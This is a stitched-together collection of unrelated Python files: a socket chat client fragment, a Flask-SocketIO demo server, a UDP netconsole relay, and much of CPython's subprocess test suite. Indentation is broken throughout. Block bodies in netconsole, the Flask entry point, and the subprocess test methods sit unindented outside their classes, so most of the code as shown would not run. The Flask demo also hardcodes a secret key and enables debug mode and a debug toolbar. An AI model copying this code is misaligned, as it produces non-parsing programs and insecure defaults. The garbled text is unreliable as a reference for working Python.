        self.listenThread = threading.Thread(target=self.listenMsg, args=(self.textBrowser_msg, self.record))
        self.listenThread.daemon = True
        self.listenThread.start()
        # Announce our id to the server (it reads the first 10 bytes as
        # the sender id -- assumes ids are exactly 10 chars; TODO confirm).
        self.sock.send(self.src_id.encode("utf-8"))

    def __del__(self):
        self.sock.close()

    def listenMsg(self, textBrowser_msg, record):
        '''
        Receive loop: append incoming text to the conversation record and
        refresh the UI when this conversation is open. Emits
        removeClientSignal on disconnect or error.
        '''
        while True:
            try:
                data = self.sock.recv(1024)
                if not data:
                    self.sock.close()
                    self.removeClientSignal.emit()
                    break
                data = data.decode("utf-8")
                if self.record != "":
                    self.record += "\n" + self.dst_id + ": " + data
                else:
                    self.record += self.dst_id + ": " + data
                if self.dst_id == self.curMsgId:
                    self.showRecordSignal.emit()
            except Exception as e:
                if DEBUG_MODE:
                    print(e)
                self.removeClientSignal.emit()
                self.sock.close()
                break

    def sendMsg(self, msg):
        '''
        Append *msg* to the record, send it prefixed with our id
        (the server strips the first 10 bytes as the sender id), and
        refresh the UI.
        '''
        if self.record != "":
            self.record += "\n" + self.src_id + ": " + msg
        else:
            self.record += self.src_id + ": " + msg
        msg = self.src_id + msg
        self.sock.sendall(msg.encode("utf-8"))
        self.showRecordSignal.emit()

    def showRecord(self):
        # Display the conversation record in the UI text browser.
        self.textBrowser_msg.setText(self.record)

    def setCurMsgId(self, id):
        # Switch the displayed conversation; refresh if it is this peer.
        self.curMsgId = id
        if id == self.dst_id:
            self.showRecordSignal.emit()
|
app.py | import time
from threading import Thread
from flask import Flask, render_template, session
from flask.ext.socketio import SocketIO, emit, disconnect
from flask_debugtoolbar import DebugToolbarExtension
from src.game import Game
from gevent import monkey
monkey.patch_all()
app = Flask(__name__)
app.debug = True
app.config['SECRET_KEY'] = 'secret!'
app.debug = True
socketio = SocketIO(app)
thread = None
toolbar = DebugToolbarExtension(app)
GAMES = {}
def background_thread():
    """Example of how to send server generated events to clients.

    Sleeps ten seconds between emissions and broadcasts a counter on the
    '/api' namespace forever.
    """
    tick = 0
    while True:
        time.sleep(10)
        tick += 1
        payload = {'data': 'Server generated event', 'count': tick}
        socketio.emit('my response', payload, namespace='/api')
@socketio.on('newgame', namespace='/api')
def newgame(message):
    """Create a fresh two-player game, register it, and ack the client."""
    message['data'] = "Game started"
    created = Game(players=['player1', 'player2'])
    GAMES[created.id] = created
    # session['player_id'] = message.get('player_id')
    # session['game_id'] = 1
    session['receive_count'] = session.get('receive_count', 0) + 1
    reply = {'data': str(created), 'count': session['receive_count']}
    emit('my response', reply)
@app.route('/load')
def load():
    # Secondary route serving the same page as '/' but without starting
    # the background event thread.
    return render_template('index.html')
@app.route('/')
def index():
    # Lazily start the demo event emitter on the first page load.
    # NOTE(review): not lock-protected — two concurrent first requests
    # could each start a thread; confirm whether that matters here.
    global thread
    if thread is None:
        thread = Thread(target=background_thread)
        thread.start()
    return render_template('index.html')
@socketio.on('my event', namespace='/api')
def test_message(message):
    # Echo handler: bumps the per-session counter and replies to the sender.
    session['receive_count'] = session.get('receive_count', 0) + 1
    emit('my response',
         {'data': message['data'], 'count': session['receive_count']})
@socketio.on('my broadcast event', namespace='/api')
def test_broadcast_message(message):
    # Same as test_message, but the reply goes to every connected client.
    session['receive_count'] = session.get('receive_count', 0) + 1
    emit('my response',
         {'data': message['data'], 'count': session['receive_count']},
         broadcast=True)
@socketio.on('disconnect request', namespace='/api')
def disconnect_request():
    # Acknowledge, then drop the socket from the server side.
    session['receive_count'] = session.get('receive_count', 0) + 1
    emit('my response',
         {'data': 'Disconnected!', 'count': session['receive_count']})
    disconnect()
@socketio.on('connect', namespace='/api')
def test_connect():
    """Greet a newly connected client with a zeroed counter."""
    # Bug fix: was the Python 2 statement ``print "User Connected"``, a
    # SyntaxError on Python 3 and inconsistent with print() used by the
    # disconnect handler in this module.
    print("User Connected")
    emit('my response', {'data': 'Connected', 'count': 0})
@socketio.on('disconnect', namespace='/api')
def test_disconnect():
    # Server-side log only; nothing is emitted to the departing client.
    print('Client disconnected')
if __name__ == '__main__':
socketio.run(app, port=5001)
|
netconsole.py | #!/usr/bin/env python
# Copyright (c) Robert Blair Mason Jr. (rbmj) rbmj@verizon.net
# see LICENSE for license information.
import socket
import sys
import threading
import atexit
import time
#allow import in both python 2.x and 3.x
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty
#ports
UDP_IN_PORT=6666
UDP_OUT_PORT=6668
#set up recieving socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind( ('',UDP_IN_PORT) )
#set up sending socket - use separate socket to avoid race condition
out = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
out.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
out.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
out.bind( ('',UDP_OUT_PORT) ) #bind is necessary for escoteric reasons stated on interwebs
#set up atexit handler to close sockets
def atexit_func():
    # Close both module-level UDP sockets on interpreter exit.
    sock.close()
    out.close()
atexit.register(atexit_func)
#set up threads to emulate non-blocking io
#thread-level emulation required for compatibility with windows
stdin_queue = Queue()
sock_queue = Queue()
def enqueue_output_file(f, q):
    """Pump lines from file object *f* into queue *q* until EOF.

    ``readline`` returns ``b''`` at end of file, which terminates the loop —
    the same sentinel the original ``iter(f.readline, b'')`` idiom used.
    """
    while True:
        line = f.readline()
        if line == b'':
            break
        q.put(line)
def enqueue_output_sock(s, q):
    """Blocking reader: push each received datagram payload from *s* onto *q*."""
    put = q.put
    recv = s.recv
    while True:
        put(recv(4096))
stdin_reader = threading.Thread(target = enqueue_output_file, args = (sys.stdin, stdin_queue))
sock_reader = threading.Thread(target = enqueue_output_sock, args = (sock, sock_queue))
stdin_reader.daemon = True
sock_reader.daemon = True
stdin_reader.start()
sock_reader.start()
#send a message out the socket
def send_msg(msg):
    """Broadcast *msg* to the robot subnet on the console output port.

    Bug fix: the body previously sent the module-level global ``line``
    instead of the ``msg`` parameter — it only worked by accident because
    the sole caller happens to pass ``line``.
    """
    out.sendto(msg, ('10.255.255.255', UDP_OUT_PORT))
#main loop: shuttle data between the console socket and stdin/stdout,
#polling both queues so neither direction can block the other.
while True:
    # Drain anything the robot printed and echo it locally.
    try: msg = sock_queue.get_nowait()
    except Empty:
        pass # no output
    else:
        sys.stdout.write(msg)
    # Forward any typed input line to the robot.
    try: line = stdin_queue.get_nowait()
    except Empty:
        pass # no input
    else:
        send_msg(line)
    # Small sleep keeps the poll loop from spinning at 100% CPU.
    time.sleep(0.05)
|
test_subprocess.py | import unittest
from unittest import mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import warnings_helper
import subprocess
import sys
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import traceback
import types
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
import json
import pathlib
from test.support.os_helper import FakePath
try:
import _testcapi
except ImportError:
_testcapi = None
try:
import pwd
except ImportError:
pwd = None
try:
import grp
except ImportError:
grp = None
try:
import fcntl
except:
fcntl = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
ZERO_RETURN_CMD = (sys.executable, '-c', 'pass')
def setUpModule():
    """Swap ZERO_RETURN_CMD for the shell's ``true`` binary when usable.

    Spawning ``true`` is much cheaper than a full Python interpreter
    start-up, which speeds up the many tests that only need a child
    process that exits with status 0.
    """
    candidate = shutil.which('true')
    if candidate is None:
        return
    usable = os.access(candidate, os.X_OK)
    if usable and subprocess.run([candidate]).returncode == 0:
        global ZERO_RETURN_CMD
        ZERO_RETURN_CMD = (candidate,)  # Faster than Python startup.
class BaseTestCase(unittest.TestCase):
    """Shared setUp/tearDown: keeps global child-process bookkeeping clean
    so one test's leaked children cannot break the next."""
    def setUp(self):
        # Try to minimize the number of children we have so this test
        # doesn't crash on some buildbots (Alphas in particular).
        support.reap_children()
    def tearDown(self):
        if not mswindows:
            # subprocess._active is not used on Windows and is set to None.
            # Wait out and purge any Popen objects awaiting cleanup, then
            # fail loudly if a test leaked one.
            for inst in subprocess._active:
                inst.wait()
            subprocess._cleanup()
            self.assertFalse(
                subprocess._active, "subprocess._active not empty"
            )
        # Run addCleanup callbacks before reaping, in case they own children.
        self.doCleanups()
        support.reap_children()
class PopenTestException(Exception):
    # Marker exception raised by the forced-failure Popen subclass below.
    pass
class PopenExecuteChildRaises(subprocess.Popen):
    """Popen subclass for testing cleanup of subprocess.PIPE filehandles when
    _execute_child fails.
    """
    def _execute_child(self, *args, **kwargs):
        # Fail unconditionally so tests can assert Popen.__init__ closed
        # the pipe fds it had already created.
        raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call(ZERO_RETURN_CMD)
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_input_none(self):
"""input=None has a legacy meaning of input='' on check_output."""
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None)
self.assertNotIn(b'XX', output)
def test_check_output_input_none_text(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, text=True)
self.assertNotIn('XX', output)
def test_check_output_input_none_universal_newlines(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, universal_newlines=True)
self.assertNotIn('XX', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with os_helper.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"buf = sys.stdout.buffer; "
"buf.write(os.getcwd().encode()); "
"buf.flush(); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode()))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with os_helper.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with os_helper.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with os_helper.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertEqual(stdout, b'42')
self.assertEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
@unittest.skipUnless(fcntl and hasattr(fcntl, 'F_GETPIPE_SZ'),
                     'fcntl.F_GETPIPE_SZ required for test.')
def test_pipesizes(self):
    """pipesize= should be reflected by F_GETPIPE_SZ on all three pipes."""
    test_pipe_r, test_pipe_w = os.pipe()
    try:
        # Get the default pipesize with F_GETPIPE_SZ
        pipesize_default = fcntl.fcntl(test_pipe_w, fcntl.F_GETPIPE_SZ)
    finally:
        os.close(test_pipe_r)
        os.close(test_pipe_w)
    pipesize = pipesize_default // 2
    if pipesize < 512:  # the POSIX minimum
        # Bug fix: was the misspelled ``unittest.SkitTest``, which raised
        # AttributeError instead of skipping the test.
        raise unittest.SkipTest(
            'default pipesize too small to perform test.')
    p = subprocess.Popen(
        [sys.executable, "-c",
         'import sys; sys.stdin.read(); sys.stdout.write("out"); '
         'sys.stderr.write("error!")'],
        stdin=subprocess.PIPE, stdout=subprocess.PIPE,
        stderr=subprocess.PIPE, pipesize=pipesize)
    try:
        for fifo in [p.stdin, p.stdout, p.stderr]:
            self.assertEqual(
                fcntl.fcntl(fifo.fileno(), fcntl.F_GETPIPE_SZ),
                pipesize)
        # Windows pipe size can be acquired via GetNamedPipeInfoFunction
        # https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-getnamedpipeinfo
        # However, this function is not yet in _winapi.
        p.stdin.write(b"pear")
        p.stdin.close()
        p.stdout.close()
        p.stderr.close()
    finally:
        p.kill()
        p.wait()
@unittest.skipUnless(fcntl and hasattr(fcntl, 'F_GETPIPE_SZ'),
                     'fcntl.F_GETPIPE_SZ required for test.')
def test_pipesize_default(self):
    # pipesize=-1 must mean "leave the OS default in place": the child's
    # pipes should report the same size as a freshly created os.pipe().
    p = subprocess.Popen(
        [sys.executable, "-c",
         'import sys; sys.stdin.read(); sys.stdout.write("out"); '
         'sys.stderr.write("error!")'],
        stdin=subprocess.PIPE, stdout=subprocess.PIPE,
        stderr=subprocess.PIPE, pipesize=-1)
    try:
        fp_r, fp_w = os.pipe()
        try:
            default_pipesize = fcntl.fcntl(fp_w, fcntl.F_GETPIPE_SZ)
            for fifo in [p.stdin, p.stdout, p.stderr]:
                self.assertEqual(
                    fcntl.fcntl(fifo.fileno(), fcntl.F_GETPIPE_SZ),
                    default_pipesize)
        finally:
            os.close(fp_r)
            os.close(fp_w)
        # On other platforms we cannot test the pipe size (yet). But above
        # code using pipesize=-1 should not crash.
        p.stdin.close()
        p.stdout.close()
        p.stderr.close()
    finally:
        p.kill()
        p.wait()
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
